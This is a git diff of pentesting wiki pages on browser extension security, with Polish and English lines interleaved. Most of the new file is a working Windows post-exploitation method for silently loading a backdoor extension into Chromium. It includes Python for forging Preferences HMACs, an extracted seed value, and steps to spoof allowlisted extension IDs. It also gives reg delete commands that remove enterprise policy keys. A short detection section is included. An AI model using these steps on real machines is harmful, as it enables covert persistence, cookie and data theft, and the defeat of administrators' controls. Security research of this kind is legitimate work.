> Rozszerzenie przeglądarki również potrzebuje uprawnienia `nativeMessaing` zadeklarowanego, aby móc korzystać z tej komunikacji.
> Rozszerzenie przeglądarki musi również zadeklarować uprawnienie `nativeMessaing`, aby móc korzystać z tej komunikacji.
Tak wygląda kod niektórego skryptu tła wysyłającego wiadomości do aplikacji natywnej:
Poniżej przykład kodu background script wysyłającego wiadomości do native application:
```javascript
chrome.runtime.sendNativeMessage(
"com.my_company.my_application",
@ -556,42 +561,42 @@ console.log("Received " + response)
}
)
```
W [**tym wpisie na blogu**](https://spaceraccoon.dev/universal-code-execution-browser-extensions/) zaproponowano podatny wzór wykorzystujący natywne wiadomości:
In [**this blog post**](https://spaceraccoon.dev/universal-code-execution-browser-extensions/), zaproponowano podatny wzorzec wykorzystujący native messages:
1. Rozszerzenie przeglądarki ma wzór z dziką kartą dla skryptu treści.
2. Skrypt treści przesyła wiadomości `postMessage` do skryptu w tle za pomocą `sendMessage`.
3. Skrypt w tle przesyła wiadomość do aplikacji natywnej za pomocą `sendNativeMessage`.
4. Aplikacja natywna niebezpiecznie obsługuje wiadomość, co prowadzi do wykonania kodu.
1. Browser extension ma wzorzec wildcard dla content script.
2. Content script przekazuje wiadomości postMessage do background script używając sendMessage.
3. Background script przekazuje wiadomość do native application używając sendNativeMessage.
4. Native application niebezpiecznie obsługuje wiadomość, co prowadzi do code execution.
A w jego wnętrzu wyjaśniono przykład **przechodzenia z dowolnej strony do RCE wykorzystując rozszerzenie przeglądarki**.
W nim znajduje się przykład wyjaśniający, jak z dowolnej strony przejść do RCE wykorzystując browser extension.
## Wrażliwe informacje w pamięci/kodzie/clipboard
## Sensitive Information in Memory/Code/Clipboard
Jeśli Rozszerzenie Przeglądarki przechowuje **wrażliwe informacje w swojej pamięci**, mogą one być **zrzucane** (szczególnie na maszynach z systemem Windows) i **wyszukiwane** w celu uzyskania tych informacji.
Jeśli Browser Extension przechowuje **wrażliwe informacje w swojej pamięci**, mogą one zostać **zrzucane** (szczególnie na maszynach z Windows) i **przeszukane** w celu odnalezienia tych informacji.
Dlatego pamięć Rozszerzenia Przeglądarki **nie powinna być uważana za bezpieczną**, a **wrażliwe informacje** takie jak dane logowania czy frazy mnemoniczne **nie powinny być przechowywane**.
Dlatego pamięć Browser Extension **nie powinna być uważana za bezpieczną**, a **wrażliwe informacje** takie jak dane uwierzytelniające czy mnemonic phrases **nie powinny być w niej przechowywane**.
Oczywiście, **nie umieszczaj wrażliwych informacji w kodzie**, ponieważ będą one **publiczne**.
Oczywiście, nie umieszczaj wrażliwych informacji w kodzie, ponieważ będzie on publiczny.
Aby zrzucić pamięć z przeglądarki, możesz **zrzucić pamięć procesu** lub przejść do **ustawień** rozszerzenia przeglądarki, klikając **`Inspect pop-up`** -> W sekcji **`Memory`** -> **`Take a snapshot`** i **`CTRL+F`** aby wyszukać w zrzucie wrażliwe informacje.
Aby zrzucić pamięć z przeglądarki możesz **zrzucić pamięć procesu** lub przejść do **ustawień** rozszerzenia przeglądarki, kliknąć **`Inspect pop-up`** -> w sekcji **`Memory`** -> **`Take a snaphost`** i użyć **`CTRL+F`**, aby wyszukać w snapshotcie wrażliwe informacje.
Ponadto, bardzo wrażliwe informacje, takie jak klucze mnemoniczne czy hasła, **nie powinny być kopiowane do schowka** (lub przynajmniej powinny być usuwane ze schowka w ciągu kilku sekund), ponieważ procesy monitorujące schowek będą mogły je uzyskać.
Co więcej, wysoce wrażliwe informacje jak mnemonic keys czy hasła **nie powinny być możliwe do skopiowania do clipboard** (albo przynajmniej usuń je ze schowka po kilku sekundach), ponieważ procesy monitorujące clipboard będą mogły je przechwycić.
## Ładowanie rozszerzenia w przeglądarce
## Loading an Extension in the Browser
1. **Pobierz** Rozszerzenie Przeglądarki i rozpakuj je.
2. Przejdź do **`chrome://extensions/`** i **włącz** `Tryb dewelopera`.
3. Kliknij przycisk **`Load unpacked`**.
1. **Download** the Browser Extension & unzipped
2. Go to **`chrome://extensions/`** and **enable** the `Developer Mode`
3. Click the **`Load unpacked`** button
W **Firefoxie** przejdź do **`about:debugging#/runtime/this-firefox`** i kliknij przycisk **`Load Temporary Add-on`**.
W **Firefox** przejdź do **`about:debugging#/runtime/this-firefox`** i kliknij przycisk **`Load Temporary Add-on`**.
## Uzyskiwanie kodu źródłowego ze sklepu
## Getting the source code from the store
Kod źródłowy rozszerzenia Chrome można uzyskać na różne sposoby. Poniżej znajdują się szczegółowe wyjaśnienia i instrukcje dla każdej opcji.
Kod źródłowy rozszerzenia Chrome można uzyskać na kilka sposobów. Poniżej znajdują się szczegółowe wyjaśnienia i instrukcje dla każdej opcji.
### Pobierz rozszerzenie jako ZIP za pomocą wiersza poleceń
### Download Extension as ZIP via Command Line
Kod źródłowy rozszerzenia Chrome można pobrać jako plik ZIP za pomocą wiersza poleceń. Wymaga to użycia `curl` do pobrania pliku ZIP z określonego adresu URL, a następnie wyodrębnienia zawartości pliku ZIP do katalogu. Oto kroki:
Kod źródłowy rozszerzenia Chrome można pobrać jako plik ZIP przy użyciu wiersza poleceń. Polega to na użyciu `curl` do pobrania pliku ZIP z określonego URL, a następnie rozpakowaniu zawartości ZIP do katalogu. Oto kroki:
1. Zastąp `"extension_id"` rzeczywistym ID rozszerzenia.
2. Wykonaj następujące polecenia:
@ -606,94 +611,102 @@ unzip -d "$extension_id-source" "$extension_id.zip"
### Użyj rozszerzenia CRX Viewer
Inną wygodną metodą jest użycie Chrome Extension Source Viewer, który jest projektem open-source. Można go zainstalować z [Chrome Web Store](https://chrome.google.com/webstore/detail/chrome-extension-source-v/jifpbeccnghkjeaalbbjmodiffmgedin?hl=en). Kod źródłowy przeglądarki jest dostępny w jej [repozytorium GitHub](https://github.com/Rob--W/crxviewer).
Inną wygodną metodą jest użycie Chrome Extension Source Viewer, który jest projektem otwartoźródłowym. Można go zainstalować z [Chrome Web Store](https://chrome.google.com/webstore/detail/chrome-extension-source-v/jifpbeccnghkjeaalbbjmodiffmgedin?hl=en). Kod źródłowy przeglądarki jest dostępny w jego [GitHub repository](https://github.com/Rob--W/crxviewer).
### Wyświetl źródło lokalnie zainstalowanego rozszerzenia
### Wyświetlanie źródła lokalnie zainstalowanego rozszerzenia
Rozszerzenia Chrome zainstalowane lokalnie można również sprawdzić. Oto jak:
Lokalnie zainstalowane rozszerzenia Chrome można również przejrzeć. Oto jak:
1. Uzyskaj dostęp do lokalnego katalogu profilu Chrome, odwiedzając `chrome://version/` i znajdując pole "Profile Path".
2. Przejdź do podfolderu `Extensions/` w katalogu profilu.
3. Ten folder zawiera wszystkie zainstalowane rozszerzenia, zazwyczaj z ich kodem źródłowym w czytelnym formacie.
Aby zidentyfikować rozszerzenia, możesz powiązać ich identyfikatory z nazwami:
Aby zidentyfikować rozszerzenia, możesz odwzorować ich ID na nazwy:
- Włącz tryb dewelopera na stronie `about:extensions`, aby zobaczyć identyfikatory każdego rozszerzenia.
- W każdym folderze rozszerzenia plik `manifest.json` zawiera czytelne pole `name`, co pomoże Ci zidentyfikować rozszerzenie.
- Włącz Developer Mode na stronie `about:extensions`, aby zobaczyć ID każdego rozszerzenia.
- W każdym folderze rozszerzenia plik `manifest.json` zawiera czytelne pole `name`, co pomaga zidentyfikować rozszerzenie.
### Użyj archiwizera plików lub dekompresora
### Użyj archiwizera plików lub rozpakowywacza
Przejdź do Chrome Web Store i pobierz rozszerzenie. Plik będzie miał rozszerzenie `.crx`. Zmień rozszerzenie pliku z `.crx` na `.zip`. Użyj dowolnego archiwizera plików (takiego jak WinRAR, 7-Zip itp.), aby wyodrębnić zawartość pliku ZIP.
Przejdź do Chrome Web Store i pobierz rozszerzenie. Plik będzie miał rozszerzenie `.crx`. Zmień rozszerzenie pliku z `.crx` na `.zip`. Użyj dowolnego archiwizera (np. WinRAR, 7-Zip itp.), aby wypakować zawartość pliku ZIP.
### Użyj trybu dewelopera w Chrome
### Użyj Developer Mode w Chrome
Otwórz Chrome i przejdź do `chrome://extensions/`. Włącz "Tryb dewelopera" w prawym górnym rogu. Kliknij "Załaduj rozpakowane rozszerzenie...". Przejdź do katalogu swojego rozszerzenia. To nie pobiera kodu źródłowego, ale jest przydatne do przeglądania i modyfikowania kodu już pobranego lub opracowanego rozszerzenia.
Otwórz Chrome i przejdź do `chrome://extensions/`. Włącz "Developer mode" w prawym górnym rogu. Kliknij na "Load unpacked extension...". Przejdź do katalogu z rozszerzeniem. To nie pobiera kodu źródłowego, ale jest przydatne do przeglądania i modyfikowania kodu już pobranego lub rozwijanego rozszerzenia.
## Zbiór danych manifestów rozszerzeń Chrome
## Zbiór manifestów rozszerzeń Chrome
Aby spróbować zidentyfikować podatne rozszerzenia przeglądarki, możesz użyć [https://github.com/palant/chrome-extension-manifests-dataset](https://github.com/palant/chrome-extension-manifests-dataset) i sprawdzić ich pliki manifestów pod kątem potencjalnie podatnych oznak. Na przykład, aby sprawdzić rozszerzenia z więcej niż 25000 użytkowników, `content_scripts` i uprawnienie `nativeMessaging`:
Aby spróbować odnaleźć podatne rozszerzenia przeglądarki, możesz użyć [https://github.com/palant/chrome-extension-manifests-dataset](https://github.com/palant/chrome-extension-manifests-dataset) i sprawdzić ich pliki manifestu w poszukiwaniu potencjalnych oznak podatności. Na przykład, aby sprawdzić rozszerzenia z ponad 25000 użytkowników, `content_scripts` i uprawnieniem `nativeMessaing`:
```bash
# Query example from https://spaceraccoon.dev/universal-code-execution-browser-extensions/
node query.js -f "metadata.user_count > 250000" "manifest.content_scripts?.length > 0 && manifest.permissions?.includes('nativeMessaging')"
```
## Lista kontrolna audytu bezpieczeństwa
## Post-exploitation: Forced extension load & persistence (Windows)
Chociaż rozszerzenia przeglądarki mają **ograniczoną powierzchnię ataku**, niektóre z nich mogą zawierać **luki** lub **możliwości wzmocnienia**. Oto najczęstsze z nich:
Stealthy technika pozwalająca wstawić backdoor do Chromium poprzez bezpośrednią edycję per-user Preferences i sfałszowanie prawidłowych HMACs, co powoduje, że przeglądarka zaakceptuje i aktywuje dowolne unpacked extension bez monitów ani flag.
- [ ] **Ogranicz** tak bardzo, jak to możliwe, żądane **`permissions`**
- [ ] **Ogranicz** tak bardzo, jak to możliwe **`host_permissions`**
- [ ] Użyj **silnej** **`content_security_policy`**
- [ ] **Ogranicz** tak bardzo, jak to możliwe **`externally_connectable`**, jeśli nie jest potrzebne i możliwe, nie zostawiaj go domyślnie, określ **`{}`**
- [ ] Jeśli **URL podatny na XSS lub przejęcie** jest tutaj wymieniony, atakujący będzie mógł **wysyłać wiadomości do skryptów w tle bezpośrednio**. Bardzo potężne obejście.
- [ ] **Ogranicz** tak bardzo, jak to możliwe **`web_accessible_resources`**, nawet puste, jeśli to możliwe.
- [ ] Jeśli **`web_accessible_resources`** nie jest puste, sprawdź [**ClickJacking**](browext-clickjacking.md)
- [ ] Jeśli jakakolwiek **komunikacja** zachodzi z **rozszerzenia** do **strony internetowej**, [**sprawdź XSS**](browext-xss-example.md) **luki** spowodowane w komunikacji.
- [ ] Jeśli używane są Post Messages, sprawdź [**luki w Post Message**](../postmessage-vulnerabilities/index.html)**.**
- [ ] Jeśli **Content Script ma dostęp do szczegółów DOM**, sprawdź, czy **nie wprowadza XSS**, jeśli zostanie **zmodyfikowany** przez sieć
- [ ] Zwróć szczególną uwagę, jeśli ta komunikacja jest również zaangażowana w **komunikację Content Script -> skrypt w tle**
- [ ] Jeśli skrypt w tle komunikuje się za pomocą **native messaging**, sprawdź, czy komunikacja jest bezpieczna i oczyszczona
- [ ] **Wrażliwe informacje nie powinny być przechowywane** wewnątrz kodu rozszerzenia przeglądarki
- [ ] **Wrażliwe informacje nie powinny być przechowywane** wewnątrz pamięci rozszerzenia przeglądarki
- [ ] **Wrażliwe informacje nie powinny być przechowywane** w **systemie plików bez ochrony**
{{#ref}}
forced-extension-load-preferences-mac-forgery-windows.md
{{#endref}}
## Ryzyka związane z rozszerzeniem przeglądarki
## Security Audit Checklist
- Aplikacja [https://crxaminer.tech/](https://crxaminer.tech/) analizuje dane, takie jak uprawnienia, które żąda rozszerzenie przeglądarki, aby określić poziom ryzyka korzystania z rozszerzenia przeglądarki.
Mimo że Browser Extensions mają **ograniczoną powierzchnię ataku**, niektóre z nich mogą zawierać **vulnerabilities** lub **możliwości wzmocnienia**. Poniższe punkty są najczęściej spotykane:
## Narzędzia
- [ ] **Limit** as much as possible requested **`permissions`**
- [ ] **Limit** as much as possible **`host_permissions`**
- [ ] Use a **strong** **`content_security_policy`**
- [ ] **Limit** as much as possible the **`externally_connectable`**, if none is needed and possible, do not leave it by default, specify **`{}`**
- [ ] If **URL vulnerable to XSS or to takeover** is mentioned here, an attacker will be able to **send messages to the background scripts directly**. Very powerful bypass.
- [ ] **Limit** as much as possible the **`web_accessible_resources`**, even empty if possible.
- [ ] If **`web_accessible_resources`** is not none, check for [**ClickJacking**](browext-clickjacking.md)
- [ ] If any **communication** occurs from the **extension** to the **web page**, [**check for XSS**](browext-xss-example.md) **vulnerabilities** caused in the communication.
- [ ] If Post Messages are used, check for [**Post Message vulnerabilities**](../postmessage-vulnerabilities/index.html)**.**
- [ ] If the **Content Script access DOM details**, check that they **aren't introducing a XSS** if they get **modified** by the web
- [ ] Make a special emphasis if this communication is also involved in the **Content Script -> Background script communication**
- [ ] If the background script is communicating via **native messaging** check the communication is secure and sanitized
- [ ] **Sensitive information shouldn't be stored** inside the Browser Extension **code**
- [ ] **Sensitive information shouldn't be stored** inside the Browser Extension **memory**
- [ ] **Sensitive information shouldn't be stored** inside the **file system unprotected**
## Browser Extension Risks
- The app [https://crxaminer.tech/](https://crxaminer.tech/) analyzes some data like the permissions browser extension requests to give a risk level of using the browser extension.
## Tools
### [**Tarnish**](https://thehackerblog.com/tarnish/)
- Pobiera dowolne rozszerzenie Chrome z podanego linku do sklepu Chrome.
- [**manifest.json**](https://developer.chrome.com/extensions/manifest) **widok**: po prostu wyświetla wersję manifestu rozszerzenia w formacie JSON.
- **Analiza odcisków palców**: Wykrywanie [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources) i automatyczne generowanie JavaScript do odcisków palców rozszerzenia Chrome.
- **Potencjalna analiza Clickjacking**: Wykrywanie stron HTML rozszerzenia z ustawionym dyrektywą [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources). Mogą być one potencjalnie podatne na clickjacking w zależności od celu stron.
- **Widok ostrzeżeń o uprawnieniach**: który pokazuje listę wszystkich ostrzeżeń o uprawnieniach Chrome, które będą wyświetlane, gdy użytkownik spróbuje zainstalować rozszerzenie.
- **Niebezpieczna funkcja**: pokazuje lokalizację niebezpiecznych funkcji, które mogą być potencjalnie wykorzystywane przez atakującego (np. funkcje takie jak innerHTML, chrome.tabs.executeScript).
- **Punkty wejścia**: pokazuje, gdzie rozszerzenie przyjmuje dane wejściowe od użytkownika/zewnętrzne. To jest przydatne do zrozumienia powierzchni rozszerzenia i szukania potencjalnych punktów do wysyłania złośliwie skonstruowanych danych do rozszerzenia.
- Zarówno skanery Niebezpiecznych funkcji, jak i Punktów wejścia mają następujące dla swoich wygenerowanych alertów:
- Odpowiedni fragment kodu i linia, która spowodowała alert.
- Opis problemu.
- Przycisk „Zobacz plik”, aby zobaczyć pełny plik źródłowy zawierający kod.
- Ścieżka alertowanego pliku.
- Pełny URI rozszerzenia Chrome alertowanego pliku.
- Typ pliku, taki jak skrypt strony w tle, skrypt treści, akcja przeglądarki itp.
- Jeśli podatna linia znajduje się w pliku JavaScript, ścieżki wszystkich stron, w których jest zawarta, a także typ tych stron oraz status [web_accessible_resource](https://developer.chrome.com/extensions/manifest/web_accessible_resources).
- **Analizator polityki bezpieczeństwa treści (CSP) i sprawdzacz obejść**: Wskaże to słabości w CSP twojego rozszerzenia i również oświetli wszelkie potencjalne sposoby obejścia twojego CSP z powodu białych list CDN itp.
- **Znane podatne biblioteki**: Używa [Retire.js](https://retirejs.github.io/retire.js/), aby sprawdzić, czy używane są znane podatne biblioteki JavaScript.
- Pobierz rozszerzenie i sformatowane wersje.
- Pobierz oryginalne rozszerzenie.
- Pobierz wersję rozszerzenia w formacie ładnym (automatycznie sformatowany HTML i JavaScript).
- Automatyczne buforowanie wyników skanowania, uruchomienie skanowania rozszerzenia zajmie sporo czasu przy pierwszym uruchomieniu. Jednak przy drugim uruchomieniu, zakładając, że rozszerzenie nie zostało zaktualizowane, będzie prawie natychmiastowe dzięki buforowanym wynikom.
- Linkowalne adresy URL raportów, łatwo linkuj kogoś do raportu rozszerzenia wygenerowanego przez tarnish.
- Pulls any Chrome extension from a provided Chrome webstore link.
- [**manifest.json**](https://developer.chrome.com/extensions/manifest) **viewer**: simply displays a JSON-prettified version of the extensions manifest.
- **Fingerprint Analysis**: Detection of [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources) and automatic generation of Chrome extension fingerprinting JavaScript.
- **Potential Clickjacking Analysis**: Detection of extension HTML pages with the [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources) directive set. These are potentially vulnerable to clickjacking depending on the purpose of the pages.
- **Permission Warning(s) viewer**: which shows a list of all the Chrome permission prompt warnings which will be displayed upon a user attempting to install the extension.
- **Dangerous Function(s)**: shows the location of dangerous functions which could potentially be exploited by an attacker (e.g. functions such as innerHTML, chrome.tabs.executeScript).
- **Entry Point(s)**: shows where the extension takes in user/external input. This is useful for understanding an extensions surface area and looking for potential points to send maliciously-crafted data to the extension.
- Both the Dangerous Function(s) and Entry Point(s) scanners have the following for their generated alerts:
- Relevant code snippet and line that caused the alert.
- Description of the issue.
- A “View File” button to view the full source file containing the code.
- The path of the alerted file.
- The full Chrome extension URI of the alerted file.
- The type of file it is, such as a Background Page script, Content Script, Browser Action, etc.
- If the vulnerable line is in a JavaScript file, the paths of all of the pages where it is included as well as these pages type, and [web_accessible_resource](https://developer.chrome.com/extensions/manifest/web_accessible_resources) status.
- **Content Security Policy (CSP) analyzer and bypass checker**: This will point out weaknesses in your extensions CSP and will also illuminate any potential ways to bypass your CSP due to whitelisted CDNs, etc.
- **Known Vulnerable Libraries**: This uses [Retire.js](https://retirejs.github.io/retire.js/) to check for any usage of known-vulnerable JavaScript libraries.
- Download extension and formatted versions.
- Download the original extension.
- Download a beautified version of the extension (auto prettified HTML and JavaScript).
- Automatic caching of scan results, running an extension scan will take a good amount of time the first time you run it. However the second time, assuming the extension hasnt been updated, will be almost instant due to the results being cached.
- Linkable Report URLs, easily link someone else to an extension report generated by tarnish.
### [Neto](https://github.com/elevenpaths/neto)
Projekt Neto to pakiet Pythona 3 stworzony do analizy i odkrywania ukrytych funkcji wtyczek i rozszerzeń przeglądarek dla znanych przeglądarek, takich jak Firefox i Chrome. Automatyzuje proces rozpakowywania spakowanych plików, aby wydobyć te funkcje z odpowiednich zasobów w rozszerzeniu, takich jak `manifest.json`, foldery lokalizacyjne lub pliki źródłowe JavaScript i HTML.
Project Neto is a Python 3 package conceived to analyse and unravel hidden features of browser plugins and extensions for well-known browsers such as Firefox and Chrome. It automates the process of unzipping the packaged files to extract these features from relevant resources in a extension like `manifest.json`, localization folders or Javascript and HTML source files.
## Odnośniki
## References
- **Dzięki** [**@naivenom**](https://twitter.com/naivenom) **za pomoc w tej metodologii**
- **Thanks to** [**@naivenom**](https://twitter.com/naivenom) **for the help with this methodology**
- [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing)
- [https://palant.info/2022/08/10/anatomy-of-a-basic-extension/](https://palant.info/2022/08/10/anatomy-of-a-basic-extension/)
- [https://palant.info/2022/08/24/attack-surface-of-extension-pages/](https://palant.info/2022/08/24/attack-surface-of-extension-pages/)

206
src/pentesting-web/browser-extension-pentesting-methodology/forced-extension-load-preferences-mac-forgery-windows.md Normal file
View File

@ -0,0 +1,206 @@
# Forced Extension Load & Preferences MAC Forgery (Windows)
{{#include ../../banners/hacktricks-training.md}}
## Przegląd
Stealthy post-exploitation technique pozwalająca wymusić załadowanie dowolnych rozszerzeń w przeglądarkach opartych na Chromium na Windows poprzez edycję użytkownika Preferences/Secure Preferences i podrobienie prawidłowych HMACs dla zmodyfikowanych węzłów. Działa przeciwko Chrome/Chromium, Edge i Brave. Stwierdzono zastosowanie od Chromium 130 do 139 w momencie publikacji. Prosty disk write primitive w profilu ofiary wystarcza, by utrwalić pełnoprawne rozszerzenie bez flag na command-line i bez monitów dla użytkownika.
> Key idea: Chromium stores per-user extension state in a JSON preferences file and protects it with HMAC-SHA256. If you compute valid MACs with the browsers embedded seed and write them next to your injected nodes, the browser accepts and activates your extension entry.
## Gdzie przechowywany jest stan rozszerzeń (Windows)
- Nondomainjoined Chrome profile:
- %USERPROFILE%/AppData/Local/Google/Chrome/User Data/Default/Secure Preferences (includes a root "super_mac").
- Domainjoined Chrome profile:
- %USERPROFILE%/AppData/Local/Google/Chrome/User Data/Default/Preferences
- Kluczowe węzły używane przez Chromium:
- extensions.settings.<extension_id> → embedded manifest/metadata for the extension entry
- protection.macs.extensions.settings.<extension_id> → HMAC for that JSON blob
- Chromium ≥134: extensions.ui.developer_mode (boolean) must be present and MACsigned for unpacked extensions to activate
Uproszczony schemat (ilustracyjny):
```json
{
"extensions": {
"settings": {
"<extension_id>": {
"name": "Extension name",
"manifest_version": 3,
"version": "1.0",
"key": "<BASE64 DER SPKI>",
"path": "<absolute path if unpacked>",
"state": 1,
"from_bookmark": false,
"was_installed_by_default": false
// ...rest of manifest.json + required install metadata
}
},
"ui": { "developer_mode": true }
},
"protection": {
"macs": {
"extensions": {
"settings": { "<extension_id>": "<MAC>" },
"ui": { "developer_mode": "<MAC>" }
}
}
}
}
```
Notatki:
- Edge/Brave utrzymują podobne struktury. Wartość protection seed może się różnić (zaobserwowano, że Edge/Brave w niektórych buildach używają null/other seed).
## ID rozszerzeń: ścieżka vs key i jak je uczynić deterministycznymi
Chromium wyprowadza ID rozszerzenia w następujący sposób:
- Rozszerzenie spakowane/podpisane: ID = SHA256 over DERencoded SubjectPublicKeyInfo (SPKI) → take first 32 hex chars → map 0f to ap
- Nie-spakowane (brak key w manifest): ID = SHA256 over the absolute installation path bytes → map 0f to ap
Aby utrzymać stabilne ID między hostami, osadź stały base64 DER public key w manifest.json pod "key". ID zostanie wyprowadzone z tego key zamiast ze ścieżki instalacji.
Helper to generate a deterministic ID and a key pair:
```python
import base64
import hashlib
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
def translate_crx_id(s: str) -> str:
t = {'0':'a','1':'b','2':'c','3':'d','4':'e','5':'f','6':'g','7':'h','8':'i','9':'j','a':'k','b':'l','c':'m','d':'n','e':'o','f':'p'}
return ''.join(t.get(c, c) for c in s)
def generate_extension_keys() -> tuple[str,str,str]:
priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pub = priv.public_key()
spki = pub.public_bytes(encoding=serialization.Encoding.DER,
format=serialization.PublicFormat.SubjectPublicKeyInfo)
crx_id = translate_crx_id(hashlib.sha256(spki).digest()[:16].hex())
pub_b64 = base64.b64encode(spki).decode('utf-8')
priv_der = priv.private_bytes(encoding=serialization.Encoding.DER,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption())
priv_b64 = base64.b64encode(priv_der).decode('utf-8')
return crx_id, pub_b64, priv_b64
print(generate_extension_keys())
```
Dodaj wygenerowany klucz publiczny do pliku manifest.json, aby zablokować ID:
```json
{
"manifest_version": 3,
"name": "Synacktiv extension",
"version": "1.0",
"key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2lMCg6..."
}
```
## Forging Preferences integrity MACs (core bypass)
Chromium chroni preferencje za pomocą HMACSHA256 obliczanego dla "path" + zserializowanej wartości JSON każdego węzła. Nasiono HMAC jest osadzone w resources.pak przeglądarki i było ważne do Chromium 139.
Wyodrębnij nasiono za pomocą GRIT pak_util i zlokalizuj kontener nasiona (file id 146 w testowanych buildach):
```bash
python3 pak_util.py extract resources.pak -o resources_v139/
python3 pak_util.py extract resources.pak -o resources_v139_dirty/
# compare a clean vs minimally modified resources.pak to spot the seed holder
xxd -p resources_v139/146
# e748f336d85ea5f9dcdf25d8f347a65b4cdf667600f02df6724a2af18a212d26b788a25086910cf3a90313696871f3dc05823730c91df8ba5c4fd9c884b505a8
```
Oblicz MACs (uppercase hex) jako:
```text
ext_mac = HMAC_SHA256(seed,
"extensions.settings.<crx_id>" + json.dumps(<settings_json>))
devmode_mac = HMAC_SHA256(seed,
"extensions.ui.developer_mode" + ("true" or "false"))
```
Minimalny przykład w Pythonie:
```python
import json, hmac, hashlib
def mac_upper(seed_hex: str, pref_path: str, value) -> str:
seed = bytes.fromhex(seed_hex)
# Compact JSON to match Chromium serialization closely
val = json.dumps(value, separators=(',', ':')) if not isinstance(value, str) else value
msg = (pref_path + val).encode('utf-8')
return hmac.new(seed, msg, hashlib.sha256).hexdigest().upper()
# Example usage
settings_path = f"extensions.settings.{crx_id}"
devmode_path = "extensions.ui.developer_mode"
ext_mac = mac_upper(seed_hex, settings_path, settings_json)
devmode_mac = mac_upper(seed_hex, devmode_path, "true")
```
Zapisz wartości pod:
- protection.macs.extensions.settings.<crx_id> = ext_mac
- protection.macs.extensions.ui.developer_mode = devmode_mac (Chromium ≥134)
Browser differences: on Microsoft Edge and Brave the seed may be null/different. The HMAC structure remains the same; adjust the seed accordingly.
> Wskazówki implementacyjne
> - Użyj dokładnie tej samej serializacji JSON, której używa Chromium przy obliczaniu MACs (skompaktowany JSON bez białych znaków jest w praktyce bezpieczny; sortowanie kluczy może pomóc uniknąć problemów z kolejnością).
> - Upewnij się, że extensions.ui.developer_mode istnieje i jest podpisane w Chromium ≥134, inaczej twoje unpacked entry nie zostanie aktywowane.
## Endtoend silent load flow (Windows)
1) Wygeneruj deterministyczne ID i osadź "key" w manifest.json; przygotuj unpacked MV3 extension z żądanymi uprawnieniami (service worker/content scripts)
2) Utwórz extensions.settings.<id> osadzając manifest i minimalne metadata instalacyjne wymagane przez Chromium (state, path for unpacked, itp.)
3) Wyodrębnij HMAC seed z resources.pak (file 146) i oblicz dwa MACs: jeden dla węzła settings i jeden dla extensions.ui.developer_mode (Chromium ≥134)
4) Zapisz spreparowane węzły i MACs do Preferences/Secure Preferences docelowego profilu; następne uruchomienie autoactivate twoje rozszerzenie ze wszystkimi zadeklarowanymi uprawnieniami
## Bypassing enterprise controls
- Whitelisted extension hash spoofing (ID spoofing)
1) Zainstaluj dozwolone Web Store extension i zanotuj jego ID
2) Uzyskaj jego public key (np. przez chrome.runtime.getManifest().key w background/service worker lub pobierając/parsując .crx)
3) Ustaw ten key jako manifest.key w zmodyfikowanym rozszerzeniu, aby odtworzyć to samo ID
4) Zarejestruj wpis w Preferences i podpisz MACs → ExtensionInstallAllowlist sprawdzenia, które dopasowują się tylko po ID, zostają ominięte
- Extension stomping (ID collision precedence)
- Jeśli lokalne unpacked extension ma to samo ID co zainstalowane Web Store extension, Chromium preferuje unpacked. To skutecznie zastępuje legalne rozszerzenie w chrome://extensions przy zachowaniu zaufanego ID. Potwierdzone na Chrome i Edge (np. Adobe PDF)
- Neutralizing GPO via HKCU (requires admin)
- Chrome/Edge policies znajdują się pod HKCU\Software\Policies\*
- Mając uprawnienia administratora, usuń/modyfikuj klucze polityk przed zapisaniem swoich wpisów, aby uniknąć blokad:
```powershell
reg delete "HKCU\Software\Policies\Google\Chrome\ExtensionInstallAllowlist" /f
reg delete "HKCU\Software\Policies\Google\Chrome\ExtensionInstallBlocklist" /f
```
## Hałaśliwe obejście: ładowanie z wiersza poleceń
Od Chromium ≥137, --load-extension wymaga również przekazania:
```text
--disable-features=DisableLoadExtensionCommandLineSwitch
```
This approach is widely known and monitored (e.g., by EDR/DFIR; used by commodity malware like Chromeloader). Preference MAC forging is stealthier.
Related flags and more crossplatform tricks are discussed here:
{{#ref}}
../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.md
{{#endref}}
## Wpływ operacyjny
Once accepted, the extension runs with its declared permissions, enabling DOM access, request interception/redirects, cookie/storage access, and screenshot capture—effectively inbrowser code execution and durable userprofile persistence. Remote deployment over SMB or other channels is straightforward because activation is datadriven via Preferences.
## Wykrywanie i zabezpieczanie
- Monitor for nonChromium processes writing to Preferences/Secure Preferences, especially new nodes under extensions.settings paired with protection.macs entries
- Alert on unexpected toggling of extensions.ui.developer_mode and on HMACvalid but unapproved extension entries
- Audit HKCU/HKLM Software\Policies for tampering; enforce policies via device management/Chrome Browser Cloud Management
- Prefer forcedinstall from the store with verified publishers rather than allowlists that match only on extension ID
## Referencje
- [The Phantom Extension: Backdooring chrome through uncharted pathways](https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways.html)
- [pak_util.py (GRIT)](https://chromium.googlesource.com/chromium/src/+/master/tools/grit/pak_util.py)
- [SecurePreferencesFile (prior research on HMAC seed)](https://github.com/Pica4x6/SecurePreferencesFile)
- [CursedChrome](https://github.com/mandatoryprogrammer/CursedChrome)
{{#include ../../banners/hacktricks-training.md}}